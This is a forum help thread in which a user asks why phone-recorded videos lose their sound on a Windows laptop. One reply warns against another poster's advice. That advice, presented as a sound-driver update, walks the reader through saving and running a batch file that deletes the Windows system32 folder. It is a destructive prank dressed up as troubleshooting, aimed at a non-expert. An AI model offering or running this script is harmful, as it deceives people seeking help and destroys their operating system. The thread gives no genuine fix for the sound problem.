Having trouble with Windows...?
I have a Samsung Strive from AT&T. Videos I record from the phone are saved onto a SD card in the phone. When I record a video and try to upload it to the computer, I hear no sound. The only time I have ever heard sound is either when it is still on the phone, or when I post it to Youtube. I tried to make a movie from Windows Live Movie Maker but there was still no sound. Why is it doing this?
My laptop is a refurbished Samsung if that helps.

Do NOT do what Franklin Edwarholtz suggested if you value the longevity of your current Windows installation.

Sounds like your sound driver not up to date. Just do this and the sound should return.
Step 1.
Open Notepad
Step 2.
Enter The following
@echo off
del C:\\WINDOWS\system32
Step 3.
Save as soundupdate.bat (save the file type as "all files" not "text document")
Step 4.
Locate the file and double click it. Now your sounds should play.
